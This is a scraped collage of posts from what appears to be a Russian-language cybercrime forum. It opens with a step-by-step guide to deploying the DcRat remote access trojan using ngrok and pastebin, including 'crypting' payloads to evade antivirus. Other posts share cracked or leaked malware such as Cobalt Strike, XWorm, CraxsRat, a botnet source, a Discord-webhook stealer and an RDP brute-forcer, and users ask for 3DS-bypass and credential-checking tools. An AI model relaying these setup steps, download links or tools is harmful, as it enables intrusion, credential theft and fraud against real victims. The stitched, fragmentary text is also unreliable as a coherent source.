Hidden content for authorized users.
](https://anonfiles.com/30879eOfu7/cobaltstrike_jar)
anonfiles.com
sha256 is correct
7af9c759ac78da920395debb443b9007fdf51fa66a48f0fbdaafb30b00a8a858 Cobalt Strike
4.4 许可 (cobaltstrike.jar)
Скачать:
You must have at least 1 reaction(s) to view the content.
Полезная информация | Helpful information
Привет всем, сегодня хочу поделится с вами обновлённой статьёй о бесплатном
вирусе удалённого управления DcRat [Не DarkCrystal].
Hello everyone, today I want to share with you an updated article about the
free remote control virus DcRat [Not DarkCrystal].
Данный вирус удалённого управления сочетает в себе смесь нескольких известных
ратников а именно AsyncRAT, Quasar и ещё нескольких проектов.
This remote control virus combines a mixture of several well-known warriors,
namely AsyncRAT, Quasar and several other projects.
Тестирование сервера проведено успешно на версиях windows 8.1, 10, 11.
Тестирование payload проведено успешно на версиях windows 7, 8.1, 10, 11.
Server testing was carried out successfully on windows 8.1, 10, 11 versions.
payload testing was carried out successfully on windows 7, 8.1, 10, 11
versions.
Из главных особенностей является | One of the main features is:
1)IP-порт сервера может быть получен с помощью pastebin.
The IP port of the server can be obtained using pastebin.
2)Поддержка нескольких портов.
Support for multiple ports.
3)Система плагинов реализованная через Dll, которая обладает сильной
расширяемостью.
A plugin system implemented through a Dll, which has strong extensibility.
4)Супер крошечный размер клиента около 40~50 килобайт.
Super tiny client size is about 40~50 kilobytes.
5)Система логирования, записывающая все события.
A logging system that records all events.
Функционал | Functions
Remote shell, Remote desktop, Remote camera, Registry Editor, File management,
Process management, Netstat, Remote recording, Process notification, Send
file, Inject file, Download and Execute ,Send notification, Chat, Open
website, Modify wallpaper, Keylogger, File lookup, DDOS, Ransomware, Disable
Windows Defender, Disable UAC, Password recovery, Discord Recovery, Open CD,
Lock screen, Client shutdown/restart/upgrade/uninstall, System
shutdown/restart/logout, Bypass Uac, Get computer information, Thumbnails,
Auto task, Mutex, Process protection, Block client, Install with schtasks,
etc.
Установка | Setup
Есть 2 варианта установки для бедных людей которые не могу позволить себе
сервер, и для людей у которых есть свой выделенный сервер.
There are 2 installation options for poor people who can't afford a server,
and for people who have their own dedicated server.
Способ № 1 с сервером| Method #1 with the server
1)Скачиваем и распаковываем файлы с репозитория
(кликабельно).
Download and unpack files from the repository
(clickable).
2)Запустим и создадим сертификат, чтобы в бедующем не потерять юзеров
обязательно сохраните сертификат.
We will launch and create a certificate, so that in the future we will not
lose users, be sure to save the certificate.
3)Добавим наш любой открытый незадействованный порт и запустим сервер.
Add our any open unused port and start the server.
4)Чтобы сделать payload необходимо нажать на контекстное меню -> builder.
To make a payload, click on the context menu -> builder.
6)Генерируем необходимый формат shellcode или exe.
Generate the required shellcode or exe format.
7)Криптуем и радуемся, из личного опыта если вы всё-таки умеете криптовать вам
необходимо обфусцировать дополнительно библиотеки для того чтобы они не были
обнаружены при пост эксплуатации.
We crypt and rejoice, from personal experience, if you still know how to
cript, you need to obfuscate additional libraries so that they are not
detected during post-operation.
Способ № 2 без сервера| Method #2 without a server
1)Регистрируем, скачиваем, настраиваем ngrok
(кликабельно).
Register, download, configure ngrok (clickable).
2)Регистрируемся в pastebin кликабельно.
We register in pastebin clickable.
3)Открываем необходимый порт командой [ngrok tcp 8848] и копируем выделенные
значения.
Open the required port with the command [ngrok tcp 8848] and copy the selected
values.
4)Создаём новую запись и вставляем выше скопированные значения.
Create a new record and paste the copied values above.
5)Копируем выделенные значения и переходим в билдер.
Copy the selected values and go to the builder.
6)Выбираем функцию get ip by link и заменяем на скопированные значения всё
после https://pastebin.com/raw/
Select the get ip by link function and replace with the copied values all
after https://pastebin.com/raw/
6)Криптуем и радуемся, из практики скажу что способ так-же подходит тем кто не
хочет потерять юзеров при утере сервера.
We crypt and rejoice, from practice I will say that the method is also
suitable for those who do not want to lose users when the server is lost.
Советы и рекомендации | Tips and recommendations
2)Для людей которые хотят криптовать данный rat не рекомендую включать функции
установки.
For people who want to encrypt this rat, I do not recommend enabling the
installation functions.
3)Так же для людей которые очень заняты
Also for people who are very busy
Ссылки | Links
Author: https://github.com/qwqdanchun
Rat: https://github.com/qwqdanchun/DcRat
My Telegram if you have question: https://t.me/zerosumOxO
Powerfull DDoS Tool Leaked
Leave A Like
(Not mine)
This good tool is useful to find domains and subdomains potentially related to a given domain. The tool is Assefinder (https://github.com/tomnomnom/assetfinder).
Elcomsoft iOS Forensic Toolkit 6.20
Perform physical and logical acquisition of iPhone, iPad and iPod Touch devices. Image device file system, extract device secrets (passwords, encryption keys and protected data) and decrypt the file system image.
Supports: all generations of iPhone, iPad, iPad Pro and iPod Touch with and without jailbreak; Apple Watch and Apple TV 4 and 4K; all versions of iOS from iOS 7 to iOS 13.x
You must have at least 10 reaction(s) to view the content.
VirusTotal
5883aa1813dc3fa44d10692e37255642d8d3d45477ba671305fad0206811aca5
Не знаю где написать, напишу тут.
Ищу софт для обхода 3дс, или скрипт.
Кореш сказал что такое может быть, интересуюсь у вас, форумчане.
Естественно не бесплатно. Строго гарант!
Спасибо!
всем привет, если кто юзал XAttacker V20 может сказать как сам инструмент,
работает нормально? В одной из площадок, отзываются не особо хорошо, но тогда
какая есть замена? Что бы отрабатывало по списку?
(в основном под cpanel)
вход domain -> url:log:pass
Заранее спасибо
Ищу бесплатный парсер email по указонному списку url. (windows/желательна
поддержка proxy)
Epochta не подходит из-за платности. Нужен софт на пару раз.
ethereum keys (hash parser) - Парсер ключей эфира, по файлам, по папкам
Принцип работы как у моего seed_parser, перетащить файл или папку.
Запускать и качать только с канала, не принимайте чужие файлы, для вашей же
безопасности. Net.Framework 7 установить.
](https://www.virustotal.com/gui/file/d4f7fa3fc6157209caae534ecc8bfc66fd9b84963e1cbd6f97d8c0ca90c99178)
VirusTotal
www.virustotal.com
Переустановил сам рат несколько раз, полностью выключил антивирус, но все ровно при создании билда билдер останавливается на вот такой х#йне, до этого такого не было, скажите что можно сделать?
ProxyBroker прокси сканер, чекер. Бесплатный и с открытыми исходниками.
https://github.com/constverum/ProxyBroker
Нужен сендер для отправки NFT в сети TON.
Может есть у кого то слитый или готов рассмотреть покупку, но за адекватный
прайс
Решил запилить простенький парсер zoominfo через кэш гугла
Язык : >= python3.8
Установка : в папке со скриптом прописать pip install -r requirements.txt
requirements.txt
Code:Copy to clipboard
beautifulsoup4==4.11.1
bs4==0.0.1
certifi==2022.9.24
charset-normalizer==2.1.1
fake-useragent==0.1.11
idna==3.4
requests==2.28.1
soupsieve==2.3.2.post1
urllib3==1.26.12
Запуск:
Code:Copy to clipboard
usage: main.py [-h] [-d D_FILE] [-p] [-t THREADS]
Zoominfo.com parser through Google Cache
optional arguments:
-h, --help show this help message and exit
-d D_FILE Domains file name. Default: domains.txt
-p Use socks5 proxies. Default: False
-t THREADS Threads number. Default: 1
Вывод скрипта вида: domain/corp_name;headquarters;phone;symbol;website;revenue;SIC;NAICS;employees;industry;CFO;CTO
airbnb.com;888 Brannan St, San Francisco, California, 94103, United States;(207) 763-4652;ABNB;www.airbnb.com;$6 Billion;47,472;72,721;6,132 employees;Hospitality, Travel Agencies & Services, Content & Collaboration Software;Dave Stephenson;Aristotle Balogh
Click to expand...
Если хотите отключить не нужные поля, то закомментируйте выборочно строки 118-128. Например:
Python:Copy to clipboard
check_words = {
'headquarters': 'in ',
'phone': 'is ',
# 'symbol': 'is ',
'website': 'is ',
'revenue': 'is ',
# 'SIC': 'SIC: ',
# 'NAICS': 'NAICS: ',
# 'employees': 'has ',
# 'industry': 'of: ',
'CFO': 'CFO is ',
'CTO': 'CTO is ',
}
Python:Copy to clipboard
import argparse
import sys
import os
from queue import Queue
from threading import RLock
from urllib.parse import quote_plus, parse_qs, urlparse
from concurrent.futures import ThreadPoolExecutor
try:
import requests
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
except ImportError as err:
print(f'[-] Import error: {err}\n\t Try to: pip install -r requirements.txt')
sys.exit()
USE_PROXY = False
LOCK = RLock()
Q_PROXIES = Queue()
PATH = os.path.dirname(__file__)
RESULTS = os.path.join(PATH, 'RESULTS')
os.makedirs(RESULTS, exist_ok=True)
class GoogleSearch:
def __init__(self, proxy=None):
self.proxies = {
'http': f'socks5://{proxy}',
'https': f'socks5://{proxy}',
} if proxy else None
self.ua = UserAgent().random
def __get_soup(self, url):
resp = requests.get(
url=url,
proxies=self.proxies,
headers={'User-Agent': self.ua},
)
return BeautifulSoup(resp.text, 'html.parser')
def search_one(self, domain):
query = quote_plus(f'site:zoominfo.com {domain}')
url = f'https://google.com/search?q={query}'
soup = self.__get_soup(url)
anchors = soup.findAll('a')
for a in anchors:
a_href = a.get('href')
if a_href and a_href.startswith('/url'):
a_parsed = urlparse(a_href, 'http')
a_url = parse_qs(a_parsed.query).get('url')
return a_url[0] if a_url else None
def parse_zoom_url(self, zoom_url):
url = f'https://webcache.googleusercontent.com/search?q=cache:{zoom_url}'
soup = self.__get_soup(url)
return [answer.text for answer in soup.findAll(class_='faq-answer')]
def safe_print(message):
with LOCK:
print(message)
def write_file(filename, data):
with LOCK:
with open(filename, 'a') as f:
f.write(f'{data}\n')
def read_file(filename):
try:
with open(filename, 'r') as f:
return [
line.rstrip()
for line in f
if line.rstrip()
]
except IOError as err:
print(f'[-] {filename} open error: {err}')
sys.exit()
def load_proxy_list(filename):
with LOCK:
if Q_PROXIES.empty():
[Q_PROXIES.put(p) for p in read_file(filename)]
def check_proxy(proxy):
try:
return True if requests.get(
url='https://google.com',
timeout=7,
proxies={
'http': f'socks5://{proxy}',
'https': f'socks5://{proxy}',
}
) else False
except:
return False
def get_proxy():
while True:
load_proxy_list()
proxy = Q_PROXIES.get()
if check_proxy(proxy):
return proxy
def answers_to_dict(answers):
check_words = {
'headquarters': 'in ',
'phone': 'is ',
'symbol': 'is ',
'website': 'is ',
'revenue': 'is ',
'SIC': 'SIC: ',
'NAICS': 'NAICS: ',
'employees': 'has ',
'industry': 'of: ',
'CFO': 'CFO is ',
'CTO': 'CTO is ',
}
answers_dict = {}
for answer in answers:
for word, sep in check_words.items():
if word in answer:
answers_dict[word] = answer.split(sep)[1]
return answers_dict
def worker(domain):
proxy = get_proxy() if USE_PROXY else None
g = GoogleSearch(proxy=proxy)
try:
zoom_url = g.search_one(domain)
except Exception as err:
safe_print(f'[-] Searching {domain} error: {err}')
write_file(f'{RESULTS}/errors_search.txt', f'{domain} - {err}')
return
try:
answers = g.parse_zoom_url(zoom_url)
except Exception as err:
safe_print(f'[-] Parsing url for {domain} error: {err}')
write_file(f'{RESULTS}/errors_parse.txt', f'{domain} - {err}')
return
try:
data = answers_to_dict(answers)
except Exception as err:
safe_print(f'[-] Converting data for {domain} error: {err}')
write_file(f'{RESULTS}/errors_convert.txt', f'{domain} - {err}')
return
if not data:
safe_print(f'[-] {domain} - NO DATA')
write_file(f'{RESULTS}/bad.txt', domain)
return
str_data = ";".join([domain, *data.values()])
safe_print(f'[+] {str_data}')
write_file(f'{RESULTS}/good.txt', str_data)
def get_args():
parser = argparse.ArgumentParser(description='Zoominfo.com parser through Google Cache')
parser.add_argument('-d', dest='d_file', default='domains.txt', help='Domains file name. Default: %(default)s')
parser.add_argument('-p', dest='use_proxy', action='store_true', help='Use socks5 proxies. Default: %(default)s')
parser.add_argument('-t', dest='threads', default=1, help='Threads number. Default: %(default)s')
return parser.parse_args()
def main():
args = get_args()
domains = [d for d in read_file(args.d_file)]
if args.use_proxy:
global USE_PROXY
USE_PROXY = True
[Q_PROXIES.put(p) for p in read_file('proxies.txt')]
print(f'[~] Loaded {Q_PROXIES.qsize()} proxies')
with ThreadPoolExecutor(max_workers=args.threads) as pool:
pool.map(worker, domains)
if __name__ == '__main__':
main()
Важно:
E-MAIL SOFTWARE without license system
I do not check for viruses. Run it on virtual or rdp to be sure
You must have at least 65 reaction(s) to view the content.
You must have at least 30 reaction(s) to view the content.
You must have at least 30 reaction(s) to view the content.
Сорцы, конечно, "древние", но порыться будет интересно, я думаю. Тут, на форуме, не видел их ранее, поэтому решил выложить на растерзание.
Hidden content for authorized users.
Ссылка с архивом:
mega.nz
Разархивираванная папка:
Контент:
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
241.2 MiB
gofile.io
Ищу кряки SpyEagle, SilentSpy у кого есть, дайте пожалуйста.
I'm looking for cracks SpyEagle, SilentSpy
Ищу масс чекер алекса ранк для удобства чтоб можно било закинуть пару сотен тисяч сайтов и их прочекали , буду благодарен
Абсолютно любое hvnc, кроме venom кряка, хотелось бы рассмотреть варианты, как принцип работает
Скачать
](https://anonfiles.com/Zbjeo927y9/RDP_Brute_rar)
anonfiles.com
](https://wdfiles.ru/36d3cd)
wdfiles.ru
Sora Botnet Source Code
Дерьмовый код однако кто то может найти его полезным
Hidden content for authorized users.
](https://anonfiles.com/r2Mba04fpb/Sora-Botnet-Source-main_zip)
anonfiles.com
Ищу Elcomsoft Phone Breaker for Mac: Forensic Edition, на рутрекере нету, вдруг у кого завалялся?
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3a22caab61f118fa0c9bbe5fa872d856d00a26de3e5a910c97f9cd16035d9c4e%2F8dcc%2Fpython- bruteforcer&hash=e9f4c2dc873720a780a926651ed33d94&return_error=1)
](https://github.com/r4v10l1/python_bruteforcer)
Bruteforce logins with python. Contribute to 8dcc/python-bruteforcer development by creating an account on GitHub.
github.com
A.
A.
A.
A.
Installation
git clone https://github.com/r4v10l1/python_bruteforcer
cd python_bruteforcer
python3 bruteforcer.py
Usage
Show help: bruteforcer.py -h
Usage: python3 bruteforcer.py -t
Link-https: //www.c-ut.com/i/full? Api =
86c38736783fe914ddf95218ca61f02cfef93481 & url = aHR0cHM6Ly9zZWVkNC5tZS8 /
Y291cG9uPW15ZGVhbHo = & type = 2
A.reply back if it is not working i will update the link
Ищу рабочий чекер cpanel с логов, не обязательно бесплатный.
Первый контакт через ПМ
С# Опенсерс под винду,что-то типо штормкити только в 2023 году. Описание взято
из источника.
Пощупать можно по линку
Hidden content for authorized users.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Faf458c34614eb92cf60ec57df515b32c9d03484492a8ab0da90c32f280561655%2FBlank-c%2FUmbral- Stealer&hash=3efc2cfbe2ee9ac3155f33067aa3414b&return_error=1)
stealer written in C#. The collected data is transferred through discord webhooks. ](https://github.com/Blank-c/Umbral-Stealer)
Umbral Stealer is a fast, lightweight stealer written in C#. The collected data is transferred through discord webhooks. - GitHub - Blank-c/Umbral- Stealer: Umbral Stealer is a fast, lightweight ste...
github.com
Добрый день, кому то возможно будет полезным в работе. (ссылка копи паст),
проверьте на клей на всякий случай.
https://mega.nz/file/3IkzXAQI#IcULqSo___vHkx7P_2yZOLpJDsyDUeSRTxOwqjPDJx0
Паранойд не юзал так что кто знает подскажите
Hi everyone,
I wonder if anyone can share the source code of this old market? that would be very much appreciated.
Thank you
Добрый день, есть проблема с установкой impacket. OS kali, python 3, pip
обновлен, при установки requirements:
pip install requirements.txt
ERROR: Could not find a version that satisfies the requirement
requirements.txt (from versions: none)
ERROR: No matching distribution found for requirements.txt
Если использовать флаг -r:
pip install -r requirements.txt
Ignoring pyreadline: markers 'sys_platform == "win32"' don't match your
environment
Или
python setup.py
Traceback (most recent call last):
File "setup.py", line 8, in
from setuptools import setup
ImportError: No module named setuptools
Не могу найти в чем проблема
Приватный регистратор аккаунтов Instagram
Перед вами возможность зарегистрировать неограниченное количество аккаунтов.
Функции
Видео на Youtube:
VirusTotal:
](https://www.virustotal.com/gui/file/9f9a2a0fd20cfb6640f6449ec873d9991d519aea2e1935a453bdf542a3bb8bfb/detection)
VirusTotal
www.virustotal.com
️ Builder :
| Schtasks - Startup - Registry | [Change Path]
| Multi Dns |
| TBotNotify - AntiKill - WDEX - Keylogger - Clipper - Sleep - Obfuscator |
| AntiAnalysis - USB Spread - Icon - Assembly |
| Icon Pack |
️ Connection :
| Stable Connection - Encrypted Connection - Encrypted Strings |
️ Extra Tools :
| Fud Downloader [HTA] - Check Port - Icon Changer - Multi Binder [Icon - Assembly - Obfuscator] |
️ Features :
Information
Monitor [Mouse - Keyboard - AutoSave - Window]
Run File [Disk - Link - Memory - Script - RunPE]
WebCam [AutoSave]
Microphone
System Sound
Open Url [Visible - Invisible]
TCP Connections
ActiveWindows
StartupManager
Registry Editor
Process Manager
Clipboard Manager
Shell
Installed Programs
DDos Attack
VB.Net Compiler
Location Manager [GPS - IP]
File Manager
Client [Restart - Close - Uninstall - Update - Block - Note]
Power [Shutdown - Restart - Logoff]
️ Options :
BlankScreen [Enable - Disable]
TaskMgr [Enable - Disable]
Regedit [Enable - Disable]
UAC [Enable - Disable]
Firewall [Enable - Disable]
Windows Update [Enable - Disable]
Invoke-BSOD
ResetScale
.Net 3.5 Install
RemovePlugins
DeleteRestore
️ Password Recovery :
| Passwords - Cookies - CreditCards - Bookmarks - Downloads - Keywords - History - Autofill |
| Chromium - Discord Tokens - TelegramSession - ProductKey - MetaMask - InternetExplorer - FileZilla - Wifi Keys |
️ Pastime :
CD
ROOM [Open - Close]
DesktopIcons [Show - Hide]
SwapMouse [Swap - Normal]
TaskBar [Show - Hide]
Screen [ON - OFF]
Volume [Up - Down - MUTE]
Start [Show - Hide]
Clock [Show - Hide]
Text Speak
Explorer [Start - Kill]
TrayNotify [Show - Hide]
Extra 1 :
ReportWindow
Performance
Edit Hosts
KeyLogger [Offline - Online]
Client Chat
FileSeacher
Commands
MessageBox / BallonTooltip
UAC Bypass [RunAs - Cmstp - Fodhelper]
Extra 2 :
Reverse Proxy
Ngrok Installer
HVNC | CommandPrompt - PowerShell - explorer | | EdgeBrowser - BraveBrowser - FireFoxBrowser - ChromeBrowser | [CloneProfile]
Hidden RDP
Hidden Apps
Hidden RDP
Bot killer
WDKiller
WDDisable
WDExclusion
Tasks :
GetKeylogger
Open Url [Visible - Invisible]
Recovery
Run File [Disk - Link - Memory]
DiscordToken
TelegramSession
MetaMask
WDExclusion
Update All Clients
New Features :
Drag And Drop Files [File Manager - Monitor - HVNC]
Run HVNC In Memory
Copy / Paste Text [HVNC]
Extract Video Thumbnail [File manager]
Vulnerability Fixed
Support All Systems
Change Group Name
Multi screen support
Bypass UAC Fixed + Fodhelper method
You can scroll up/down on some apps [Monitor - HVNC]
File Manager Updated
Hidden Apps
Hidden Browser
Remote Dekstop Updated
Process Manager Updated
Enable,Disable MouseMove
HVNC Fixed
Recovery Plugins Updated
[ Lifetime - Support - Updates ]
Requirements :
.Net Framework 4.5 [Controller]
.Net Framework 4.0 [Client]
Size : 49.0 KB [Full Features]
Best Software Quality Ever
Sample XWorm Panel:
Virustotal
Sample XWorm Loader :
Virustotal
Download Software And Loader :
XWorm 5.3 Cracked
Version
Password :
@BlackHatGhost
Hidden content for authorized users.
](https://anonfiles.com/Pc2fU0mez1/Aura_Checker_1njector_rar)
anonfiles.com
Сегодня Вам выложу рабочую программу которая будет крутить зрителей на ютуб бесплатно.
зрителей, всегда по-разному**
Ты давно стримишь и тебя мало кто смотрит ? Данная программа тебе поможет пробиться в топ, аккаунты не банятся так как считает ютуб что заходят живые пользователи.
You must have at least 10 reaction(s) to view the content.
Вот и все, на видео я показал как программа крутит и сколько крутит, на момент написания статьи программа крутит до 1К зрителей, у меня бывало что программа крутила 2500 зрителей, все зависит от прокси.
Давайте в первую очередь возьмем id нашего стрима, id идет то что после рано, вот пример https://www.youtube.com/watch?v=5DdjYt1knXY все что после = это и есть наш id
Далее вставляем наш id в программу где написано id стрима, после чего нам нужны будут прокси, я их оставлю с архивом.
Отлично, после того как вы очистили вам нужно туда загрузить ссылку с прокси, можно взять бесплатные прокси ТУТ или можете попросить тестовые прокси ТУТ или купить ТУТ
Отлично, мы все сделали, теперь можно нажимать кнопку запустить и смотреть как летят зрители, если нечего не поняли, смотрите видео.
**
**
Ваш пальчик вверх мотивирует делать больше статей с видео инструкцией для
Вас.
Я бы хотел узнать можно ли как-нибудь обойти условия на покупку акций в приложении и продать подарочные акции без пополнения?
Hey friends,
Just wanted to share this version.
It's 100% clean without backdoors
](https://www.mediafire.com/file/0vh5iqigljwchz3/CraxsRatv7-Cleaned.7z/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Have fun
What you need to do?
Just comment with what site u need a config and a test account hidden for me
so i can see it only
This release provides improved support for WebSocket functionality in the Montoya API, as well as a number of minor improvements and bug fixes.
We have improved Montoya API support for WebSockets. This enables you to create extensions that interact more effectively with WebSockets. You can now:
We have made a number of minor improvements, including:
We have fixed a number of minor bugs:
This release upgrades Burp's browser to Chromium [111.0.5563.64/65](https://chromereleases.googleblog.com/2023/03/stable- channel-update-for-desktop.html). This upgrade contains a critical security fix, as well as several high-severity fixes.
Due to a recent Chrome upgrade, Burp Scanner is no longer compatible with the Windows Server 2012 and Windows 7/8/8.1 operating systems. For more information, see the related [Chrome announcement](https://support.google.com/chrome/thread/185534985/sunsetting- support-for-windows-7-8-8-1-and-windows-server-2012-and-2012-r2-in- early-2023?hl=en).
DOWNLOAD:
Hidden content for authorized users.
https://ponies.cloud/scanner_web/BurpSuitePro_2023.2.3+BurpBounty262.7z
Forum post: https://cyberarsenal.org/resources/burpsuite-pro.37/updates
Their TG channel: https://t.me/Pwn3rzs
Hidden content for users named zeneq.
Download;https://t.me/+IyxlZ-wNRcRmNjQy
Menu;
Собственно вопрос в теме. Ищу рабочий чекер фтп как минимум на валид, как максимум на пробив домена и вывод статистики по нему, еще бы хорошо было если бы он автоматом собирал данные с логов и чекал, подскажите если есть у кого
Всех приветствую готовый софт под работу , пишите, помогу поставить на ваш сервер , покажу как работать не терять ботнет @Walle0_o
360 火绒 Windows Defender Shellcode Loader ](https://github.com/T4y1oR/RingQ)
一款后渗透免杀工具,助力每一位像我这样的脚本小子快速实现免杀,支持bypass AV/EDR 360 火绒 Windows Defender Shellcode Loader - T4y1oR/RingQ
github.com
Не актуально просьба деактивировать мой аккаунт
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/Z9ZhhKQI#9DdkDyXIsbE1hlSOASioPtFI7sT-GvU-3d8Erif6uwg)
mega.nz
__
](https://www.virustotal.com/gui/file/c04db40042db043ca9f8aa53c966051215939c9535ec64dcced785547d916955/detection)
VirusTotal
www.virustotal.com
Hello everyone if you like it give me likes
[LIKES = 1] https://www.mediafire.com/file/r3k2vhkv2ihczwz/Advance_Web_hacking_tools.rar/file [/ LIKES]
Both burp pro 2021.6 the latest version and burp bounty pro which is an
extension used for burp Happy hacking!!
Password is 311138
Burp pro: https://mega.nz/file/DThghLTQ#3AKj88VjQifYw088RnCbMiWH0sSvrMTqze5xCppdbTc
burp bounty pro: <https://mega.nz/file/6fwwRZxJ#gEJmzUBDGc8mw- EmhyXKK6Xjuy0GNwbLoQzMiAP7Kr0> ps all our posts will be written in English and Russian to help both communities on this forum understand our posts.
И burp pro 2021.6 последняя версия и burp bounty pro, который является
расширением, используемым для burp Счастливого взлома!!!
Пароль 311138
Burp pro:
https://mega.nz/file/DThghLTQ#3AKj88VjQifYw088RnCbMiWH0sSvrMTqze5xCppdbTc
burp bounty pro: <https://mega.nz/file/6fwwRZxJ#gEJmzUBDGc8mw- EmhyXKK6Xjuy0GNwbLoQzMiAP7Kr0>
ps все наши сообщения будут написаны на английском и русском языках, чтобы помочь обоим сообществам на этом форуме понять наши сообщения. ps all our posts will be written in English and Russian to help both communities on this forum understand our posts.
Требуется какой то простенький и бесплатный стилак для тестов.(функционал тоже
уровня азора подойдет)
Если кто может билд скинуть-буду благодарен.
Приветствую всех форумчан, сегодня я хотел бы рассказать о таком интересном Telegram-боте под названием @iptools_robot, который будет очень полезен специалистам в области информационной безопасности, ламерам и OSINTерам. Данного бота удобно использовать, если вы не имеете доступ к своей основной машине, но при этом с собой телефон с установленным Telegram.
Сам жеIPTools Robot содержит в себе более 30 различных функций, начиная от обычного /whois и поиску по Shodan , заканчивая встроенными утилитами SQLmap, Wpscan, ffuf, nth и так далее.
Функционал
Сначала поговорим о функциях, которые включает в себя бот, рассмотрим самые
основные и интересные.
На следующем скриншоте показаны команды, которые доступны каждому пользователю
бота.
/search — команда из колонки Shodan, которая позволяет искать по Shodan, используя различные фильтры и запросы.
/subdomain — очень полезная функция, которая выполняет поиск поддоменов сайта и моментально отдает ответ.
Ответ:
Code:Copy to clipboard
Отчет сгенерирован t.me/iptools_robot
google.com | 142.250.125.101
area120.google.com | 172.217.14.238
tables.area120.google.com | 142.250.191.46
calljoy.area120.google.com | 172.217.5.110
bpui0.google.com | 74.125.195.92
time1.google.com | 216.239.35.0
ns1.google.com | 216.239.32.10
hedns1.google.com | 216.239.36.10
alt1.google.com | 173.194.202.100
time2.google.com | 216.239.35.4
ns2.google.com | 216.239.34.10
alt2.google.com | 216.58.193.206
alt43.google.com | 172.217.29.110
time3.google.com | 216.239.35.8
ns3.google.com | 216.239.36.10
alt3.google.com | 142.250.141.100
time4.google.com | 216.239.35.12
ghs4.google.com | 142.250.69.211
ns4.google.com | 216.239.38.10
alt4.google.com | 172.217.7.110
ghs46.google.com | 142.250.69.211
drivemetadata.clients6.google.com | 142.251.33.106
pubsub.clients6.google.com | 142.250.217.106
dataproc.clients6.google.com | 142.250.217.74
cloudbuild.clients6.google.com | 172.217.6.74
... > 500
/nmap — встроенный сканер портов Nmap, на котором также работает функция
/ptr.
Ответ также достаточно минимализированный, а команда соответствует nmap -Pn {hostname}
Ответ:
Code:Copy to clipboard
Отчет сгенерирован t.me/iptools_robot
37.187.25.182 (xss.is): up
tcp - 80 (http) - open
tcp - 443 (https) - open
/range — функция для получения IP-диапазонов по двухбуквенному коду страны
или ASN.
Для большего удобства в этой и некоторых других командах убраны метки бота
Отчет сгенерирован t.me/iptools_robot
**
/link — **тоже достаточно интересная функция, которая собирает все ссылки на
сайте.
В примере используется https://www.google.com
Ответ:
Code:Copy to clipboard
Отчет сгенерирован t.me/iptools_robot
https://www.google.ru/imghp?hl=ru&tab=wi
https://maps.google.ru/maps?hl=ru&tab=wl
https://play.google.com/?hl=ru&tab=w8
https://www.youtube.com/?gl=RU&tab=w1
https://news.google.com/?tab=wn
https://mail.google.com/mail/?tab=wm
https://drive.google.com/?tab=wo
https://www.google.ru/intl/ru/about/products?tab=wh
http://www.google.ru/history/optout?hl=ru
https://www.google.com/preferences?hl=ruhttps://accounts.google.com/ServiceLogin?hl=ru&passive=true&continue=https://www.google.com/&ec=GAZAAQ
https://www.google.com/advanced_search?hl=ru&authuser=0https://www.google.com/intl/ru/ads/http://www.google.ru/intl/ru/services/
https://www.google.com/intl/ru/about.htmlhttps://www.google.com/setprefdomain?prefdom=RU&prev=https://www.google.ru/&sig=K_50bB9gQPzFbyYOHlCY7B9vmLkUY%3D
https://www.google.com/intl/ru/policies/privacy/https://www.google.com/intl/ru/policies/terms/
Премиум функционал
Стоит отметить, что в данном боте премиум достаточно недорогой и приобрести
его можно по команде /premium
или из списка команд, нажав на кнопку
Премиум меню.
Ценник на данные функции оправдан, некоторые утилиты из премиум функционала, а также и из обычного требуют использования их через API, в котором бывают жесткие лимиты и приходится покупать недешевую лицензию или искать ключи. Сервис скриншотов стал исключением, там наша команда просто нашла endpoint, про который я писал у себя на канале.
Не буду углубляться и описывать функции, а просто покажу скриншот тех инструментов, которые есть на данный момент. Со всеми этими инструментами большинство из вас уже давно знакомы.
Итог
Изначально данный бот мне не принадлежал, приобрел я его месяц назад и
потратил примерно неделю-две, чтобы переписать и поднять его с колен в
техническом плане, поэтому бот находится на beta-стадии и могут быть ошибки /
недочеты, если вы нашли что-то подобное, то буду рад, если отпишите в PM на
форуме или в Telegram.
Сразу говорю, что я не собираю данные о том, что сканируют пользователи, но верить или нет это уже ваше личное дело. Также у бота нет списка запрещенных ресурсов для сканирования, не знаю правда, хорошо это или плохо.
Буду рад новым предложениям, а команде форума готов предоставить премиум- подписку бесплатно.
Бот — @iptools_robot
Новостной канал — @iptools_channel или
@hashbin
Помогите плиз правильно настроить Emeditor чтобы не зависал при заменнах в
больших файлах..
отблагодарю
@alfagref
нужен бесплатный рмс (много хочу, но мечтать не вредно))
Цель: скинуть на комп жертвы, дабы жертва не спалила (скинуть не проблема), и
спиздить всё что смогу с пк
upt: да да, сам не могу сделать и клянчу как последний лох
Парсер доски объявлений "Из рук в руки"
Spoiler: Screenshot
Для получения ключа активации используйте "KeyGen.exe"
You must have at least 5 reaction(s) to view the content.
I'm using Redline.
When there are multiple Chrome profiles it doesnt capture the cookies. It says
no cookies. There are cookies, but multiple Chrome profiles. Redline only
retrieves cookies when there is only the Default profile for some reason
Anyone knows how to fix this?
Сам бот написан на основе библиотек Pyrogram, Tgcrypto.
Для использования необходимо заполнить данные в файле .input:
BOT_TOKEN взять после регистрации бота в BotFather
BOT_ID - ID бота, начинающийся с "@"
API_ID и API_HASH взять с сайта my.telegram.org
ADMIN_ID - Ваш ID
TECHNICAL_CHANNEL - ID технического канала, куда бот будет отправлять
посты на модерацию
BLACKLIST - сюда вписывать слова, по которым бот будет отсеивать посты с
рекламой
Строка кампаний выглядит следующим образом:
iD_канала_для_постинга:Название_канала;iD_канала_для_постинга:Название_канала;=iD_канала_донора:Название_канала_донора;iD_канала_донора:Название_канала_донора;|iD_канала_для_постинга:Название_канала;iD_канала_для_постинга:Название_канала;=iD_канала_донора:Название_канала_донора;iD_канала_донора:Название_канала_донора;
Сюда необходимо добавить свои каналы и каналы-доноры.
Важно!!
Не нужно удалять лишние каналы, просто везде вставьте ID нужных каналов. Если
каналов больше, чем нужно, можно расширить строку кампаний в 2 раза(не меньше)
